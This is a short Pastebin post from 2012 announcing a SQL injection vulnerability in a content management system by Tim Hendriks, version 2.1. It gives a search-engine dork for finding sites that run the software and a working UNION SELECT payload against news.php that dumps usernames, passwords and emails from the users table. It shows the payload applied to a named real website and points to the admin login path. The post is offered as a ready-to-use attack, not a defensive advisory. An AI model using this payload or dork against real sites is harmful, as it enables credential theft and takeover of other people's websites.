Advertisement
The_KGB

[Vuln] Tim Hendriks CMS SQLi vulnerability

Mar 25th, 2012
501
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. [-]
  2. CMS Version: Version 2.1
  3.  
  4. [-]
  5. Injection Point : /news.php?id=-9 [ SQL ]
  6.  
  7. [-]
  8. Dork: intext:"Powered by Content-Management-System " © Tim Hendriks 2008 " + inurl:news.php?id=
  9.  
  10. [-]
  11. Exploit Code: /news.php?id=-9 union select 1,2,3,4,group_concat(username,0x3a,pass,0x3a,email))from cms_users--
  12.  
  13.  
  14. [-]
  15. Example: http://www.boom-trikes.de/news.php?id=-9 union select 1,2,3,4,group_concat(username,0x3a,pass,0x3a,email))from cms_users--
  16.  
  17. [-]
  18. Login Admin Panel : http://server/cms/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement